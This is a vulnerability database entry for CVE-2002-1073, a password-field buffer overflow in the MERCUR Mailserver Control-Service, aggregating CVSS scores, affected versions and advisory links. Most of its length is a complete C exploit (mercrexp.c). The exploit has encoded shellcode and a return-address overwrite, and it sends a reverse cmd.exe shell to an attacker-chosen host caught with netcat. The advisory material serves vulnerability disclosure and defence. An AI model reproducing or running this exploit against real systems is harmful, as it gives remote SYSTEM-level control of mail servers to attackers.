CVE-2002-1073
CVSS 7.5
Published: 2002-10-04 00:00:00
Last revised: 2008-09-05 16:29:42

[Original] Buffer overflow in the control service for MERCUR Mailserver 4.2 allows remote attackers to execute arbitrary code via a long password.


[CNNVD] MERCUR Mailserver Control-Service Remote Buffer Overflow Vulnerability (CNNVD-200210-168)

        
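MERCUR Mailserver is a mail server program suited to small and medium-sized businesses. Its default installation includes Control-Service, which listens on TCP port 32000.
The Control-Service component of MERCUR Mailserver lacks proper bounds checking on user-supplied password data, and a remote attacker can exploit this vulnerability to carry out a buffer overflow attack.
The Control-Service component includes a user authentication mechanism but does not properly check user-supplied data. An attacker can submit a string of more than 260 bytes as the user password for Control-Service to process, causing a buffer overflow in the component. Carefully crafted password data allows the attacker to execute arbitrary instructions on the system as the Mailserver process.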
        

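- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]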

- CPE (Affected platforms and products)

cpe:/a:atrium_software:mercur_mailserver:3.3_sp2
cpe:/a:atrium_software:mercur_mailserver:3.3_sp1
cpe:/a:atrium_software:mercur_mailserver:4.1
cpe:/a:atrium_software:mercur_mailserver:4.1_sp1
cpe:/a:atrium_software:mercur_mailserver:3.3
cpe:/a:atrium_software:mercur_mailserver:4.2

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1073
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1073
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-168
(Official data source) CNNVD

- Other links and resources

http://www.iss.net/security_center/static/9618.php
(VENDOR_ADVISORY)  XF  mercur-control-service-bo(9618)
http://www.securityfocus.com/bid/5261
(VENDOR_ADVISORY)  BID  5261
http://archives.neohapsis.com/archives/bugtraq/2002-07/0195.html
(UNKNOWN)  BUGTRAQ  20020717 MERCUR Mailserver advisory/remote exploit

- Vulnerability information

MERCUR Mailserver Control-Service Remote Buffer Overflow Vulnerability
High risk    Boundary condition error
2002-10-04 00:00:00 2005-10-20 00:00:00
Remote
        
        

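- Advisories and patches

Workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* There is currently no suitable workaround.
Vendor patch:
Atrium Software
---------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software keep watching the vendor's home page for the latest version: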
        
        http://www.atrium-software.com/mercur/mercur_e.html

- Vulnerability information (21626)

3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow (EDBID:21626)
windows remote
2002-07-16 Verified
0 Anonymous
N/A [Click to download]
source: http://www.securityfocus.com/bid/5261/info

MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver. 

/*
	mercrexp.c (7/16/2002)

	# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
	# nc -l -p 3333
	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-2000 Microsoft Corp.
	
	E:\WINNT\system32>	

	2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)	
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>

// CALL EBX; mcrctrl.exe@0x228e
#define EIP "\x8e\x2c\x40\x00"

// payload.. dumped into remote memory as failed 'username'
// dark spyrit's shell, ripped from jill.c
unsigned char shell[] =
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90"
		"\x90\x90\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95"
		"\x40\xe2\xfa\x2d\x95\x95\x64\xe2\x14\xad\xd8\xcf\x05\x95"
		"\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95\xc8\x1e\x40\x14"
		"\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
		"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3"
		"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66"
		"\x33\xe1\x9d\xcc\xca\x16\x52\x91\xd0\x77\x72\xcc\xca\xcb"
		"\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6\x5c\xf3"
		"\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95"
		"\x96\x56\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d"
		"\xe1\x94\x95\x95\xa6\x55\x39\x10\x55\xe0\x6c\xc7\xc3\x6a"
		"\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95\x7d\xce\x94\x95"
		"\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
		"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5"
		"\x18\xd2\x85\xc5\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18"
		"\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18\xd2\x89\xc5\x6a\xc2\x55"
		"\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a\xc2\x51"
		"\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2"
		"\xcd\x14\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95"
		"\x18\xd2\xe5\xc5\x18\xd2\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff"
		"\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14\x78\xd5\x6b\x6a"
		"\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
		"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45"
		"\x1e\x7d\xc5\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a"
		"\x10\x3f\x95\x95\x95\xa6\x55\xc5\xd5\xc5\xd5\xc5\x6a\xc2"
		"\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d\xf3\x52"
		"\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d"
		"\x95\x94\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a"
		"\xc2\x49\xa6\x5c\xc4\xc3\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2"
		"\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15\xab\x95\xe1\xba"
		"\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
		"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff"
		"\x95\x6a\xa3\xc0\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05"
		"\x05\x05\x05\x7e\x27\xff\x95\xfd\x95\x91\x95\x95\xc0\xc6"
		"\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1\x09\xff"
		"\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2"
		"\x49\x7e\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55"
		"\x39\x10\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e"
		"\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
		"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
		"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95"
		"\xd2\xf0\xe1\xc6\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa"
		"\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6"
		"\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1\xc5\xfc"
		"\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6"
		"\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4"
		"\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed"
		"\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9\xfa\xe6"
		"\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
		"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6"
		"\xfa\xf6\xfe\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6"
		"\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0"
		"\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb\xf0\xed"
		"\xf0\x95\x0a";

// fake user
unsigned char user[] = "\x78\x78\x78\x78\x0a";

// ebp/eip overwrite
unsigned char passwd[] =
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x03\xde\x83\xc3\x02\xff\xd3\xc3\x10"EIP""
		"\x0a";

main(char argc, char **argv){
        int fd;
        int bufsize = 1024;
        int buffer = malloc(bufsize);
        unsigned short int      a_port;
        unsigned long           a_host;
        struct sockaddr_in sin;
        struct hostent *he;
        struct in_addr in;

	printf("MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit (07/16/2002)\n");
        printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)\n\n");

        if (argc < 5){
                printf("usage: %s <targethost> <controlport> <localhost> <localport>\n", argv[0]);
                printf("	controlport: MERCUR Control-Service port (default 32000)\n\n");
		printf("NOTE: tested against win2k and winxp pro..\n\n");
                exit(-1);
        }

	// riiiiiiip
        a_port  = htons(atoi(argv[4]));
        a_port ^= 0x9595;
        if ((he = gethostbyname(argv[3])) == 0){herror(argv[3]);exit(-1);}
        a_host  = *((unsigned long *)he->h_addr);
        a_host ^= 0x95959595;
        shell[1113] = ((a_port) & 0xff);
        shell[1114] = ((a_port >> 8) & 0xff);        
        shell[1118] = ((a_host) & 0xff);
        shell[1119] = ((a_host >> 8) & 0xff);
        shell[1120] = ((a_host >> 16) & 0xff);
        shell[1121] = ((a_host >> 24) & 0xff);

        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

        if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
        else
        if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
        sin.sin_port = htons(atoi(argv[2]));

	printf("ret: 0x00402c8e (mrcctrl.exe v.4.2.1.0)\n\n");
 
        printf("connecting to tcp port %s...\n", argv[2]);
        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
 
        printf("connected.\n\n");
 	sleep(1);
	printf("dumping payload...");
        if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}
	printf("done\n");
        sleep(1);
        printf("sending fake login...");
        if(write(fd, user, strlen(user)) < strlen(user)){perror("write error");exit(-1);}
        printf("done\n");
	sleep(1);
	printf("eip overrun...");
	if(write(fd, passwd, strlen(passwd)) < strlen(passwd)){perror("write error");exit(-1);}
	printf("done\n\n");

	printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);

        close(fd);

}

		

- Vulnerability information

14488
MERCUR Mailserver Control Service Password Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-07-18 Unknown
2002-07-18 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

MERCUR Mailserver Control-Service Buffer Overflow Vulnerability
Boundary Condition Error 5261
Yes No
2002-07-18 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to 2c79cbe14ac7d0b8472d3f129fa1df <c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com>.

- Affected program versions

Atrium Software MERCUR Mailserver 4.2
Atrium Software MERCUR Mailserver 4.0 1 SP1
Atrium Software MERCUR Mailserver 4.0 1
Atrium Software MERCUR Mailserver 3.3 SP2
Atrium Software MERCUR Mailserver 3.3 SP1
Atrium Software MERCUR Mailserver 3.3

- Vulnerability discussion

MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.

- Exploit

The following exploit was provided:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
